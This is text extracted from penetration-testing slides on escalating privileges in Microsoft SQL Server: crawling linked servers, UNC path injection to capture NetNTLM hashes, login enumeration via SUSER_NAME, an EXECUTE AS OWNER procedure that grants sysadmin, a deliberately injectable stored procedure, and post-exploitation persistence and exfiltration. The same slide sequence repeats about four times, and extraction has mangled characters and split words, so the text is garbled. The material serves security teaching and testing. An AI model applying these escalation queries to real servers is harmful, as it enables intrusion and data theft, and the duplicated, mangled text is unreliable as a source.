Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
